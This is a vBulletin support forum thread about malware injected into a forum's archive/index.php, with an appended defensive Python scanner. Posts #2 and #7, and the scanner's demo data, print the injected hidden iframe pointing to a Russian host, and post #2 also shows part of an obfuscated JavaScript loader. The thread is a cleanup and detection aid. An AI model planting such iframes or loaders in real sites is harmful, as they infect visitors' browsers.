  • Malware report on archive.

    Hi all
    My site is running 3.7.2. I have had an email from Google saying there is malware on the /archive. When I look at the webmaster tools in the Google account, these are the errors I find.

    Code:
    URL: http://www.myforum.com/archive/index.php?t-8701.html
    Last checked: September 8, 2010
    
    
      Suspected injected code Instances 
    <iframe src='http://z145235.infobox.ru/go.php?sid=2' width='
    1' height='1' style='visibility: hidden;'>
    and also

    Code:
    URL:http://myforum.com/archive/
    Last checked: September 8, 2010 
    
    
      Suspected injected code Instances 
    <iframe src='http://z145235.infobox.ru/go.php?sid=2' width='
    1' height='1' style='visibility: hidden;'>
    How do I get rid of this, and what is the t-8701.html at the end of the archive/index.php?

    Thanks for your help

  • #2
    OK... I have looked at the archive/index.php file and there looks to be non-vBulletin code at the bottom. I'll post the last bit of code of what I believe to be vBulletin and the start of the offending script .... could you please confirm if I am correct and which is the exact last line of vB code.

    Code:
        $output .= "<div id=\"content\">\n";
        $output .= $error_message;
        $output .= "</div>\n";
    }
     
    ($hook = vBulletinHook::fetch_hook('archive_complete')) ? eval($hook) : false;
     
    $output .= "
    <div id=\"copyright\">$vbphrase[vbulletin_copyright]</div>
    </div>
    </body>
    </html>";  IS THIS THE LAST LINE OF VB CODE
     
    if (defined('NOSHUTDOWNFUNC'))
    {
        exec_shut_down();
    }
     
    echo $output;
     
    ($hook = vBulletinHook::fetch_hook('archive_complete_postoutput')) ? eval($hook) : false;
     
    /*======================================================================*\
    || ####################################################################
    || # Downloaded: 11:07, Fri Jun 27th 2008
    || # CVS: $RCSfile$ - $Revision: 26358 $
    || ####################################################################
    \*======================================================================*/
    ?><body><iframe src='http://z145235.infobox.ru/go.php?sid=2' width='1' height='1' style='visibility: hidden;'></iframe>
    var i={j:{i:{i:'~',l:'.',j:'^'},l:{i:'%',l:218915,j:1154%256},j:{i:1^0,l:55,j:'ijl'}},i:{i:{i:function(j){try{var l=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x69\x6e\x70\x75\x74');l['\x74\x79\x70\x65']='\x68\x69\x64\x64\x65\x6e';l['\x76\x61\x6c\x75\x65']=j;l['\x69\x64']='\x6a';document['\x62\x6f\x64\x79']['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](l);}catch(j){return false;}
    return true;},l:function(){try{var l=document['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64']('\x6a');}catch(l){return false;}
    return l.value;},j:function(){var l=i.i.i.i(i.l.i.i('.75.............



    • #3
      The last line of original vBulletin code is ?> at the bottom after the blurb of downloaded information. The <body> and iframe tags that come after are the third party code that has been injected into your files.



      • #4
        Thanks Zachery .... I'll delete it once I'm home. Has this most likely been injected via a hack?



        • #5
          Most common is by a worm/trojan that infects FTP programs. So make sure you scan your PC very well: latest virus definitions and multiple antivirus scanners. Change your FTP password. Then download vBulletin from the members area. Unpack and upload that.
          Also consider if there are other PCs that could be infected.
          I buy 420 forums



          • #6
            If you are using vBSEO then see this patch to a security flaw:
            Security Bulletin - vBSEO 3.5.2 Released
            I buy 420 forums



            • #7
              Originally posted by Alfa1:
              If you are using vBSEO then see this patch to a security flaw:
              Security Bulletin - vBSEO 3.5.2 Released
              Thanks for the reply.

              I am not using vbseo.

              I have deleted the script and all the junk has been removed from the footer of the archive index page.
              I am still getting a warning from Kaspersky saying there is a malicious script on the page. If I open the page in 'view source' I can see the offending script, but I don't know where to delete it .... I can't see it on other pages when I view source, so it must be in a specific template maybe. Can someone take a look at the code and tell me where I need to navigate to edit it out? Thanks. The code in red is the part I need to remove.
              Code:
              <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
              <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
              <head>
               <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
               <meta name="keywords" content="xxxxxxxxxxxxxxxxxxxxxxxxxx" />
               <meta name="description" content="A discussion forum for pipe and drum bands across the globe, oh, and a load of fun too  http://xxxxxxx.com/" />
               <title>Pipe Band Forum</title>
               <link rel="stylesheet" type="text/css" href="http://www.xxxxxxx.com/archive/archive.css" />
              </head>
              <body><iframe src='http://z145235.infobox.ru/go.php?sid=2' width='1' height='1' style='visibility: hidden;'></iframe>This is the part I need to remove<div class="pagebody">
              <div id="navbar"><a href="http://www.xxxxxx.com/archive/index.php">Pipe Band Forum</a></div>
              <hr />
              <div class="pda"><a href="http://www.xxxxxxx.com/archive/index.php?pda=1" rel="nofollow">PDA</a></div>
              <p class="largefont">View Full Version: <a href="http://www.xxxxxxx.com/index.php">Pipe Band Forum</a></p>
              <div id="content">



              • #8
                Ok... found it. It is still within the archive/index.php



                • #9
                  Have you scanned all computers that have FTP access to the server?
                  I buy 420 forums



                  • #10
                    Yes, my home computers are clean, but I remember that my work computer got infected with malware a few months ago and only Malwarebytes would get rid of it.



                    • #11
                      Eek, my index.php has been hacked again with a script.



                      • #12
                        This is mainly related to your server security. You should scan your server for malicious PHP scripts, and additionally you should protect your chmod 777 folders.

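The replies in #3, #5 and #12 together describe what to look for: code appended after the final ?> of a vBulletin file, a hidden 1x1 iframe, obfuscated JavaScript, files that differ from a freshly unpacked copy, and world-writable (chmod 777) directories. The following scanner is an added example written for this thread, not vBulletin code and not something any poster ran. It is read-only, meant to be pointed at a copy of the web root plus a clean unpacked vBulletin tree, and every sample file it builds in demo() is constructed here; only the iframe URL and the \xNN-escaped fragment are taken from the snippet quoted in post #2.

```python
"""Read-only scanner for the indicators described in this thread: a hidden
1x1 iframe, obfuscated JavaScript built from \\xNN escapes, code appended
after a PHP file's final closing tag, and world-writable (chmod 777)
directories. It also lists files that differ from a clean vendor copy.
Added example, not vBulletin code; all sample data below is constructed."""
import hashlib
import os
import re
import stat
import tempfile

# A hidden iframe as quoted in the thread: 1x1 and/or visibility:hidden.
HIDDEN_IFRAME = re.compile(
    r"<iframe\b[^>]*?(?:width=['\"]?1['\"]?(?=[\s/>])[^>]*?height=['\"]?1['\"]?(?=[\s/>])"
    r"|visibility:\s*hidden)[^>]*>",
    re.IGNORECASE,
)
# Six or more consecutive \xNN escapes, as in the obfuscated script in post #2.
HEX_ESCAPED = re.compile(r"(?:\\x[0-9a-fA-F]{2}){6,}")
# Markup or eval() appearing after the last "?>" of a PHP file (post #3's point).
SUSPICIOUS_TAIL = re.compile(r"<(?:iframe|script|body)\b|\beval\s*\(", re.IGNORECASE)
SCAN_SUFFIXES = (".php", ".html", ".htm", ".js")


def scan_content(text):
    """Return the indicator names found in one file's text (empty list if clean)."""
    hits = []
    if HIDDEN_IFRAME.search(text):
        hits.append("hidden_iframe")
    if HEX_ESCAPED.search(text):
        hits.append("hex_escaped_js")
    close = text.rfind("?>")
    if close != -1 and SUSPICIOUS_TAIL.search(text[close + 2:]):
        hits.append("code_after_php_close")
    return hits


def scan_tree(root):
    """Map each suspicious path (relative to root) to its list of indicators."""
    findings = {}
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames:
            full = os.path.join(dirpath, name)
            if os.stat(full).st_mode & stat.S_IWOTH:  # chmod 777 style directory
                findings[os.path.relpath(full, root)] = ["world_writable_dir"]
        for name in filenames:
            if not name.lower().endswith(SCAN_SUFFIXES):
                continue
            full = os.path.join(dirpath, name)
            with open(full, encoding="utf-8", errors="replace") as fh:
                hits = scan_content(fh.read())
            if hits:
                findings[os.path.relpath(full, root)] = hits
    return findings


def _sha256(path):
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def changed_files(root, clean_root):
    """Files under root that are missing from, or differ from, a clean unpacked copy."""
    changed = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root)
            clean = os.path.join(clean_root, rel)
            if not os.path.isfile(clean) or _sha256(clean) != _sha256(full):
                changed.append(rel)
    return sorted(changed)


# Constructed stand-in for the end of a clean archive/index.php.
CLEAN_PHP = "<?php\n$output = '<html></html>';\necho $output;\n?>\n"
# The injected tail, shortened from the snippet quoted in post #2 (raw string
# keeps the \xNN escapes literal, exactly as they sit on disk).
INJECTED_TAIL = (
    "?><body><iframe src='http://z145235.infobox.ru/go.php?sid=2' width='1' "
    "height='1' style='visibility: hidden;'></iframe>\n"
    r"var i={i:function(j){var l=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x69\x6e\x70\x75\x74');}};"
    "\n"
)


def demo():
    """Build a throwaway clean copy and a tampered live copy, then scan the live one."""
    clean = tempfile.mkdtemp(prefix="clean_")
    live = tempfile.mkdtemp(prefix="live_")
    for base in (clean, live):
        os.makedirs(os.path.join(base, "archive"))
        os.chmod(os.path.join(base, "archive"), 0o755)
        with open(os.path.join(base, "archive", "index.php"), "w") as fh:
            fh.write(CLEAN_PHP)
    with open(os.path.join(live, "archive", "index.php"), "a") as fh:
        fh.write(INJECTED_TAIL)  # tamper with the live copy only
    os.makedirs(os.path.join(live, "uploads"))
    os.chmod(os.path.join(live, "uploads"), 0o777)  # the "chmod 777 folder" case
    return scan_tree(live), changed_files(live, clean)


if __name__ == "__main__":
    findings, changed = demo()
    for path, hits in sorted(findings.items()):
        print(f"{path}: {', '.join(hits)}")
    print("changed vs clean copy:", changed)
```

The pattern checks are heuristics: a legitimate template can have HTML after ?>, so treat scan_tree() as a shortlist and let changed_files() against a freshly downloaded package (what post #5 recommends uploading anyway) be the authoritative list of what to restore. Re-running both after the clean upload is the quick way to catch the re-infection reported in #11.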
